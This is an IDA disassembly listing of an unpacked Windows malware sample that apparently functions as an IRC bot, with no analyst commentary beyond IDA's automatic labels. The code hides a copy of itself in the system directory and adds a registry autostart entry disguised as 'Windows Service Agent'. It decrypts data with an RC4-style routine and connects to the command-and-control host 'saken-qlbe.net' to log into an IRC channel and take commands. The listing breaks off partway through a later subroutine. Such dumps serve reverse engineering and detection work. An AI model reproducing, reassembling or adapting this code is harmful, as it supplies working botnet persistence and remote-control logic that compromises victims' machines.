;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 538C11BEFA9F9D56F23054224D36D849
; File Name : u:\work\538c11befa9f9d56f23054224d36d849_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0003A8F3 ( 239859.)
; Section size in file : 0003A8F3 ( 239859.)
; Offset to raw data for section: 00001000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_0 segment para public 'CODE' use32
assume cs:_0
;org 401000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401404+346�p
; sub_418EAE+1E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor edi, edi
xor esi, esi
mov ebx, offset aWindowsService ; "Windows Service Agent"
loc_401010: ; CODE XREF: sub_401000+6A�j
lea eax, [ebp+var_4]
push edi
push eax
push edi
push 0F003Fh
push edi
push edi
push edi
push ds:off_43F054[esi]
push ds:dword_43F050[esi]
call ds:dword_4E2F7C ; RegCreateKeyExA
cmp [ebp+arg_0], edi
jz short loc_401051
push [ebp+arg_0]
call sub_41BC70
pop ecx
push eax
push [ebp+arg_0]
push 1
push edi
push ebx
push [ebp+var_4]
call ds:dword_4E2FEC ; RegSetValueExA
jmp short loc_40105B
; ---------------------------------------------------------------------------
loc_401051: ; CODE XREF: sub_401000+33�j
push ebx
push [ebp+var_4]
call ds:dword_4E2F2C ; RegDeleteValueA
loc_40105B: ; CODE XREF: sub_401000+4F�j
push [ebp+var_4]
call ds:dword_4E2FA4 ; RegCloseKey
add esi, 8
cmp esi, 18h
jb short loc_401010
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401071 proc near ; CODE XREF: sub_4010AA+54�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
or esi, 0FFFFFFFFh
test edi, edi
jz short loc_4010A3
mov ecx, 0FFh
push ebx
loc_401088: ; CODE XREF: sub_401071+2F�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_43C020[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_401088
pop ebx
loc_4010A3: ; CODE XREF: sub_401071+F�j
mov eax, esi
pop edi
not eax
pop esi
retn
sub_401071 endp
; =============== S U B R O U T I N E =======================================
sub_4010AA proc near ; CODE XREF: sub_416D68+23F�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_41BE40
mov [esp+10h+var_10], offset dword_43F068
push [esp+10h+arg_0]
mov esi, eax
call sub_41E490
mov edi, eax
pop ecx
test edi, edi
pop ecx
jnz short loc_4010F5
loc_4010CF: ; CODE XREF: sub_4010AA+37�j
xor eax, eax
jmp short loc_401116
; ---------------------------------------------------------------------------
loc_4010D3: ; CODE XREF: sub_4010AA+4F�j
inc ebx
push ebx
push esi
call sub_41C330
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4010CF
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_41E180
add esp, 10h
loc_4010F5: ; CODE XREF: sub_4010AA+23�j
test byte ptr [edi+0Ch], 10h
jz short loc_4010D3
dec ebx
push ebx
push esi
call sub_401071
push esi
mov ebx, eax
call sub_41C9D0
push edi
call sub_41BCF0
add esp, 10h
mov eax, ebx
loc_401116: ; CODE XREF: sub_4010AA+27�j
pop edi
pop esi
pop ebx
retn
sub_4010AA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push esi
lea eax, [ebp-34h]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov byte ptr [ebp-34h], 0Ah
mov byte ptr [ebp-33h], 0Eh
mov byte ptr [ebp-32h], 20h
mov byte ptr [ebp-31h], 48h
mov byte ptr [ebp-30h], 0Bh
mov byte ptr [ebp-2Fh], 2Bh
mov byte ptr [ebp-2Eh], 0Ch
mov byte ptr [ebp-2Dh], 23h
mov byte ptr [ebp-2Ch], 3Ah
mov byte ptr [ebp-2Bh], 27h
mov byte ptr [ebp-2Ah], 28h
mov byte ptr [ebp-29h], 5Eh
mov byte ptr [ebp-28h], 2Ah
mov byte ptr [ebp-27h], 1Eh
mov byte ptr [ebp-26h], 2Dh
mov byte ptr [ebp-25h], 5Ah
mov byte ptr [ebp-24h], 1Bh
mov byte ptr [ebp-23h], 0Fh
mov byte ptr [ebp-22h], 4Ch
mov byte ptr [ebp-21h], 44h
mov byte ptr [ebp-20h], 16h
mov byte ptr [ebp-1Fh], 4
mov byte ptr [ebp-1Eh], 57h
mov byte ptr [ebp-1Dh], 23h
mov byte ptr [ebp-1Ch], 11h
mov byte ptr [ebp-1Bh], 53h
mov byte ptr [ebp-1Ah], 38h
mov byte ptr [ebp-19h], 13h
mov byte ptr [ebp-18h], 0Dh
mov byte ptr [ebp-17h], 12h
mov byte ptr [ebp-16h], 25h
mov byte ptr [ebp-15h], 1Ch
mov byte ptr [ebp-14h], 30h
mov byte ptr [ebp-13h], 12h
mov byte ptr [ebp-12h], 50h
mov byte ptr [ebp-11h], 4Fh
mov byte ptr [ebp-10h], 39h
mov byte ptr [ebp-0Fh], 10h
mov byte ptr [ebp-0Eh], 42h
mov byte ptr [ebp-0Dh], 1Fh
mov byte ptr [ebp-0Ch], 37h
mov byte ptr [ebp-0Bh], 1Dh
mov byte ptr [ebp-0Ah], 41h
mov byte ptr [ebp-9], 55h
mov byte ptr [ebp-8], 2Ch
mov byte ptr [ebp-7], 41h
mov byte ptr [ebp-6], 2Ch
mov byte ptr [ebp-5], 58h
mov [ebp-4], bl
call sub_41BC70
mov esi, 101h
mov [ebp-38h], eax
push esi
lea eax, [ebp-13Ch]
push ebx
push eax
call sub_41E4B0
push esi
lea eax, [ebp-240h]
push ebx
push eax
call sub_41E4B0
add esp, 1Ch
xor eax, eax
mov ecx, 100h
loc_401224: ; CODE XREF: _0:0040122E�j
mov [ebp+eax-13Ch], al
inc eax
cmp eax, ecx
jb short loc_401224
cmp [ebp+14h], ebx
jz short loc_401253
xor eax, eax
loc_401237: ; CODE XREF: _0:0040124F�j
cmp edi, [ebp+14h]
jnz short loc_40123E
xor edi, edi
loc_40123E: ; CODE XREF: _0:0040123A�j
mov edx, [ebp+10h]
mov dl, [edi+edx]
inc edi
mov [ebp+eax-240h], dl
inc eax
cmp eax, ecx
jb short loc_401237
jmp short loc_40126D
; ---------------------------------------------------------------------------
loc_401253: ; CODE XREF: _0:00401233�j
xor esi, esi
loc_401255: ; CODE XREF: _0:0040126B�j
cmp edi, [ebp-38h]
jnz short loc_40125C
xor edi, edi
loc_40125C: ; CODE XREF: _0:00401258�j
mov al, [ebp+edi-34h]
inc edi
mov [ebp+esi-240h], al
inc esi
cmp esi, ecx
jb short loc_401255
loc_40126D: ; CODE XREF: _0:00401251�j
mov [ebp+14h], ebx
xor edi, edi
mov eax, 0FFh
loc_401277: ; CODE XREF: _0:004012A7�j
mov ebx, [ebp+14h]
mov cl, [ebp+edi-240h]
lea esi, [ebp+edi-13Ch]
mov dl, [esi]
add ebx, edx
add ecx, ebx
and ecx, eax
inc edi
mov [ebp+14h], ecx
cmp edi, 100h
lea ecx, [ebp+ecx-13Ch]
mov bl, [ecx]
mov [esi], bl
mov [ecx], dl
jb short loc_401277
xor edi, edi
cmp [ebp+0Ch], edi
mov [ebp+14h], edi
mov [ebp+10h], edi
jbe short loc_4012FB
loc_4012B6: ; CODE XREF: _0:004012F9�j
inc edi
and edi, eax
lea ecx, [ebp+edi-13Ch]
mov dl, [ecx]
mov bl, dl
add ebx, [ebp+14h]
and ebx, eax
mov esi, ebx
mov [ebp+14h], esi
lea esi, [ebp+esi-13Ch]
mov bl, [esi]
mov [ecx], bl
mov ebx, [ebp+10h]
mov [esi], dl
mov cl, [ecx]
mov esi, [ebp+8]
add ecx, edx
and ecx, eax
add esi, ebx
mov cl, [ebp+ecx-13Ch]
xor [esi], cl
inc ebx
cmp ebx, [ebp+0Ch]
mov [ebp+10h], ebx
jb short loc_4012B6
loc_4012FB: ; CODE XREF: _0:004012B4�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401300 proc near ; DATA XREF: sub_401404+14�o
var_2A4 = dword ptr -2A4h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push ds:dword_455F0C
call ds:dword_4E3060 ; closesocket
call sub_40B854
call ds:dword_4E2F20 ; WSACleanup
call ds:dword_4E2F20 ; WSACleanup
mov ebx, ds:dword_4F534C
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41E4B0
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_41E4B0
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset dword_45517C
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:off_4F5344
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jz short loc_4013C5
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:off_4F533C
call esi ; sub_50B3D5
push [ebp+var_C]
call esi ; sub_50B3D5
loc_4013C5: ; CODE XREF: sub_401300+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_455178
mov eax, [esp+2A4h+var_2A4]
mov large fs:0, eax
add esp, 8
push edi
call ds:off_4F5338
pop edi
pop esi
pop ebx
loc_4013E8: ; DATA XREF: _2:0043F004�o
jmp $+5
push 0FFFFh
push 539h
call sub_419313
pop ecx
mov ds:dword_4E2D00, eax
pop ecx
retn
sub_401300 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401404 proc near ; CODE XREF: _0:00422221�p
var_984 = byte ptr -984h
var_880 = byte ptr -880h
var_87F = byte ptr -87Fh
var_6F0 = byte ptr -6F0h
var_5F0 = byte ptr -5F0h
var_4EC = byte ptr -4ECh
var_3EC = byte ptr -3ECh
var_2E8 = byte ptr -2E8h
var_1E4 = byte ptr -1E4h
var_E0 = dword ptr -0E0h
var_D4 = dword ptr -0D4h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 984h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_401300
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_4F537C
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_4E2D04, eax
call esi ; GetTickCount
push eax
call sub_41EB60
pop ecx
call sub_409D10
push 2
call ds:dword_4E3074 ; SetErrorMode
push 7530h
push offset aTarab ; "Tarab"
push ebx
push ebx
call ds:dword_4F5378 ; CreateMutexA
push eax
call ds:dword_4F5374 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_401484
push 1
call ds:off_4F5338
loc_401484: ; CODE XREF: sub_401404+76�j
lea eax, [ebp+var_880]
push eax
push 202h
call ds:dword_4E2F38 ; WSAStartup
cmp eax, ebx
jnz loc_40199C
cmp [ebp+var_880], 2
jnz loc_401996
xor eax, eax
mov al, [ebp+var_87F]
cmp al, 2
jnz loc_401996
mov esi, 104h
lea eax, [ebp+var_3EC]
push esi
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_2E8]
push esi
push eax
push ebx
call ds:off_4F5370
push eax
call ds:off_4F5344
lea eax, [ebp+var_4EC]
push eax
lea eax, [ebp+var_6F0]
push eax
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
call sub_41ED30
lea eax, [ebp+var_4EC]
push eax
lea eax, [ebp+var_6F0]
push eax
push offset dword_43FA44
lea eax, [ebp+var_5F0]
push esi
push eax
call sub_41EC30
lea eax, [ebp+var_3EC]
push eax
lea eax, [ebp+var_2E8]
push eax
call sub_41EBB0
add esp, 30h
test eax, eax
jnz loc_4016E7
cmp ds:dword_43F090, ebx
mov esi, offset byte_43F0FC
jz short loc_40157C
push esi
xor edi, edi
call sub_41BC70
sub eax, 4
pop ecx
jz short loc_40157C
loc_401559: ; CODE XREF: sub_401404+176�j
call sub_41EB70
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov ds:byte_43F0FC[edi], dl
inc edi
call sub_41BC70
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_401559
loc_40157C: ; CODE XREF: sub_401404+145�j
; sub_401404+153�j
lea eax, [ebp+var_3EC]
push esi
push eax
lea eax, [ebp+var_1E4]
push offset dword_43FA4C
push eax
call sub_41EA60
add esp, 10h
lea eax, [ebp+var_1E4]
push eax
call ds:off_4F536C
cmp eax, 0FFFFFFFFh
jz short loc_4015BC
lea eax, [ebp+var_1E4]
push 80h
push eax
call ds:dword_4F5368 ; SetFileAttributesA
loc_4015BC: ; CODE XREF: sub_401404+1A4�j
mov esi, ds:dword_4F5364
xor edi, edi
jmp short loc_4015E8
; ---------------------------------------------------------------------------
loc_4015C6: ; CODE XREF: sub_401404+1F7�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_4015FD
cmp eax, 20h
jz short loc_4015DA
cmp eax, 5
jnz short loc_4015FD
loc_4015DA: ; CODE XREF: sub_401404+1CF�j
xor edi, edi
push 3A98h
inc edi
call ds:dword_4F534C ; Sleep
loc_4015E8: ; CODE XREF: sub_401404+1C0�j
lea eax, [ebp+var_1E4]
push ebx
push eax
lea eax, [ebp+var_2E8]
push eax
call esi ; CopyFileA
test eax, eax
jz short loc_4015C6
loc_4015FD: ; CODE XREF: sub_401404+1CA�j
; sub_401404+1D4�j
lea eax, [ebp+var_1E4]
push eax
call sub_418D6A
pop ecx
lea eax, [ebp+var_1E4]
push 7
push eax
call ds:dword_4F5368 ; SetFileAttributesA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_41E4B0
push 44h
lea eax, [ebp+var_E0]
pop esi
push esi
push ebx
push eax
call sub_41E4B0
mov [ebp+var_E0], esi
xor esi, esi
inc esi
add esp, 18h
mov [ebp+var_D4], offset byte_4E2E78
mov [ebp+var_B4], esi
mov [ebp+var_B0], bx
call ds:dword_4F535C ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_4F5358 ; OpenProcess
lea ecx, [ebp+var_2E8]
push ecx
push eax
lea eax, [ebp+var_1E4]
push eax
lea eax, [ebp+var_984]
push offset dword_43FA54
push eax
call sub_41EA60
add esp, 14h
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_3EC]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_984]
push ebx
push eax
lea eax, [ebp+var_1E4]
push eax
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jz short loc_4016E7
push 0C8h
call ds:dword_4F534C ; Sleep
push [ebp+var_1C]
mov esi, ds:off_4F533C
call esi ; sub_50B3D5
push [ebp+var_18]
call esi ; sub_50B3D5
call ds:dword_4E2F20 ; WSACleanup
push ebx
call ds:off_4F5338
loc_4016E7: ; CODE XREF: sub_401404+134�j
; sub_401404+2B9�j
cmp ds:dword_4F3308, 2
jle short loc_401733
mov eax, ds:dword_4F330C
push dword ptr [eax+4]
call sub_41E710
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4F5374 ; WaitForSingleObject
push esi
call ds:off_4F533C
mov eax, ds:dword_4F330C
cmp [eax+8], ebx
jz short loc_401733
push 7D0h
call ds:dword_4F534C ; Sleep
mov eax, ds:dword_4F330C
push dword ptr [eax+8]
call ds:dword_4F5354 ; DeleteFileA
loc_401733: ; CODE XREF: sub_401404+2EA�j
; sub_401404+314�j
cmp ds:dword_43F094, ebx
jz short loc_401750
cmp ds:dword_4E3094, ebx
jnz short loc_401750
lea eax, [ebp+var_5F0]
push eax
call sub_401000
pop ecx
loc_401750: ; CODE XREF: sub_401404+335�j
; sub_401404+33D�j
lea eax, [ebp+var_9C]
push offset dword_43FA60
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_9C]
push ebx
push eax
call sub_40B691
lea eax, [ebp+var_9C]
push eax
call sub_415A3C
push 0B80h
push ebx
push offset dword_455180
call sub_41E4B0
lea eax, [ebp+var_9C]
push offset unk_43FA7C
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_9C]
push 1
push eax
call sub_40B691
add esp, 38h
mov esi, eax
mov edi, ds:dword_4F5350
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_41A689
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_455F14[esi], eax
jnz short loc_4017F0
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_9C]
push offset unk_43FAA0
push eax
call sub_41EA60
add esp, 0Ch
loc_4017F0: ; CODE XREF: sub_401404+3CF�j
lea eax, [ebp+var_9C]
push eax
call sub_415A3C
push 2
call sub_40B8D3
pop ecx
test eax, eax
pop ecx
jnz short loc_401875
lea eax, [ebp+var_9C]
push offset dword_43FAE0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_9C]
push 2
push eax
call sub_40B691
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_410B14
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_455F14[esi], eax
jnz short loc_401868
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_9C]
push offset dword_43FB0C
push eax
call sub_41EA60
add esp, 0Ch
loc_401868: ; CODE XREF: sub_401404+447�j
lea eax, [ebp+var_9C]
push eax
call sub_415A3C
pop ecx
loc_401875: ; CODE XREF: sub_401404+403�j
call sub_41EB70
push 7Fh
and eax, 3
push offset aSakenQlbe_net ; "saken-qlbe.net"
push offset dword_4E2D0C
mov ds:dword_4E2E74, eax
call sub_41E510
mov eax, ds:dword_43F070
push 3Fh
mov edi, offset dword_4E2D8C
push offset a0 ; "#0#"
push edi
mov ds:dword_4E2E5C, eax
call sub_41E510
push 3Fh
mov esi, offset dword_4E2DCC
push offset a7lome ; "7lome"
push esi
call sub_41E510
mov ds:dword_4E2E60, ebx
loc_4018C7: ; CODE XREF: sub_401404+53E�j
; sub_401404+588�j
add esp, 24h
loc_4018CA: ; CODE XREF: sub_401404+546�j
mov [ebp+var_4], ebx
loc_4018CD: ; CODE XREF: sub_401404+4FF�j
push offset dword_4E2D08
mov ds:dword_4E2E70, ebx
call sub_4019A5
cmp eax, 2
jz loc_401991
cmp ds:dword_4E2E70, ebx
jz short loc_4018F1
dec [ebp+var_4]
loc_4018F1: ; CODE XREF: sub_401404+4E8�j
push 0BB8h
call ds:dword_4F534C ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4018CD
cmp [ebp+var_C], ebx
jz short loc_401944
push 7Fh
push offset aSakenQlbe_net ; "saken-qlbe.net"
push offset dword_4E2D0C
call sub_41E510
mov eax, ds:dword_43F070
push 3Fh
push offset a0 ; "#0#"
push edi
mov ds:dword_4E2E5C, eax
call sub_41E510
push 3Fh
push offset a7lome ; "7lome"
push esi
call sub_41E510
mov [ebp+var_C], ebx
jmp short loc_4018C7
; ---------------------------------------------------------------------------
loc_401944: ; CODE XREF: sub_401404+504�j
cmp ds:byte_43F0E0, bl
jz loc_4018CA
push 7Fh
push offset byte_43F0E0
push offset dword_4E2D0C
call sub_41E510
mov eax, ds:dword_43F074
push 3Fh
push offset dword_43F0F0
push edi
mov ds:dword_4E2E5C, eax
call sub_41E510
push 3Fh
push offset a7lome_0 ; "7lome"
push esi
call sub_41E510
mov [ebp+var_C], 1
jmp loc_4018C7
; ---------------------------------------------------------------------------
loc_401991: ; CODE XREF: sub_401404+4DC�j
call sub_40B854
loc_401996: ; CODE XREF: sub_401404+A1�j
; sub_401404+B1�j
call ds:dword_4E2F20 ; WSACleanup
loc_40199C: ; CODE XREF: sub_401404+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_401404 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019A5 proc near ; CODE XREF: sub_401404+4D4�p
; DATA XREF: sub_401C87+66ED�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_4019CA: ; CODE XREF: sub_4019A5+E6�j
; sub_4019A5+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call ds:dword_4E2FC8 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40AD91
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_401B07
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_41E4B0
push 0
lea eax, [ebp+var_2C]
push ds:dword_43F0A4
push ds:dword_43F0A0
push eax
call sub_40B38F
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_455F18
push edi
push eax
call sub_41E510
add esp, 28h
push 6
push 1
push 2
call ds:dword_4E3048 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov ds:dword_455F0C[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401A90
push esi
call ds:dword_4E3060 ; closesocket
call sub_40ADBA
push 7D0h
loc_401A85: ; CODE XREF: sub_4019A5+146�j
call ds:dword_4F534C ; Sleep
jmp loc_4019CA
; ---------------------------------------------------------------------------
loc_401A90: ; CODE XREF: sub_4019A5+CD�j
lea eax, [ebp+var_18C]
push eax
push offset unk_43FB40
call sub_415AB0
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_401B0B
add esp, 28h
mov edi, eax
push esi
call ds:dword_4E3060 ; closesocket
test edi, edi
jz loc_4019CA
cmp edi, 1
jnz short loc_401AED
push 0DBBA0h
jmp short loc_401A85
; ---------------------------------------------------------------------------
loc_401AED: ; CODE XREF: sub_4019A5+13F�j
cmp edi, 2
jnz loc_4019CA
push [ebp+var_34]
call sub_40B9A7
pop ecx
push edi
pop eax
loc_401B01: ; CODE XREF: sub_4019A5+164�j
pop edi
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401B07: ; CODE XREF: sub_4019A5+5A�j
xor eax, eax
jmp short loc_401B01
sub_4019A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B0B proc near ; CODE XREF: sub_4019A5+123�p
var_1A90 = byte ptr -1A90h
var_A90 = byte ptr -0A90h
var_2C0 = byte ptr -2C0h
var_140 = byte ptr -140h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A90h
call sub_41EF80
push ebx
push esi
push edi
xor ebx, ebx
push 3
mov [ebp+var_8], ebx
lea eax, [ebp+var_2C0]
pop ecx
loc_401B29: ; CODE XREF: sub_401B0B+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_401B29
cmp ds:byte_4E2E6C, bl
jz short loc_401B50
push offset byte_4E2E6C
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_409C2F
add esp, 0Ch
loc_401B50: ; CODE XREF: sub_401B0B+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_40B38F
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_41EA60
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401BBA
push [ebp+arg_0]
call ds:dword_4E3060 ; closesocket
push 1388h
call ds:dword_4F534C ; Sleep
loc_401BB3: ; CODE XREF: sub_401B0B+D9�j
; sub_401B0B+153�j
xor eax, eax
loc_401BB5: ; CODE XREF: sub_401B0B+16F�j
; sub_401B0B+177�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401BBA: ; CODE XREF: sub_401B0B+92�j
; sub_401B0B+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A90]
push esi
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_1A90]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_4E2FE0 ; recv
test eax, eax
jle short loc_401BB3
lea eax, [ebp+var_A90]
push eax
lea eax, [ebp+var_1A90]
push eax
call sub_418A5E
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_401BBA
lea edi, [ebp+var_A90]
loc_401C0B: ; CODE XREF: sub_401B0B+165�j
xor esi, esi
inc esi
loc_401C0E: ; CODE XREF: sub_401B0B+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_2C0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_401C87
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_401C51
push 7D0h
call ds:dword_4F534C ; Sleep
jmp short loc_401C0E
; ---------------------------------------------------------------------------
loc_401C51: ; CODE XREF: sub_401B0B+137�j
cmp esi, 0FFFFFFFDh
jz short loc_401C7F
cmp esi, 0FFFFFFFEh
jz short loc_401C77
cmp esi, 0FFFFFFFFh
jz loc_401BB3
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_401C0B
jmp loc_401BBA
; ---------------------------------------------------------------------------
loc_401C77: ; CODE XREF: sub_401B0B+14E�j
xor eax, eax
inc eax
jmp loc_401BB5
; ---------------------------------------------------------------------------
loc_401C7F: ; CODE XREF: sub_401B0B+149�j
push 2
pop eax
jmp loc_401BB5
sub_401B0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C87 proc near ; CODE XREF: sub_401B0B+12A�p
var_5D88 = byte ptr -5D88h
var_5988 = byte ptr -5988h
var_5588 = byte ptr -5588h
var_53F8 = byte ptr -53F8h
var_51F8 = byte ptr -51F8h
var_50F4 = byte ptr -50F4h
var_4FF4 = byte ptr -4FF4h
var_4EF0 = byte ptr -4EF0h
var_4DF0 = byte ptr -4DF0h
var_4CF0 = byte ptr -4CF0h
var_4BF0 = byte ptr -4BF0h
var_4AF0 = byte ptr -4AF0h
var_48F0 = byte ptr -48F0h
var_47EC = byte ptr -47ECh
var_46EC = byte ptr -46ECh
var_45EC = byte ptr -45ECh
var_4588 = byte ptr -4588h
var_4488 = byte ptr -4488h
var_4288 = byte ptr -4288h
